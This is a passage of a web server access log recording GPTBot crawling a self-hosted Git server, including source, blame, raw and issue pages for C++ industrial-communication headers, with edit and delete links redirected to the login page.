+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:59:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1590] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 14314] [Gzip 6.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:59:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10964] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:59:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:59:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:59:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:59:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13398] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:59:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11617] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:59:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 13077] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12982] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:18:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10096] [Gzip 3.19] [Sent-to 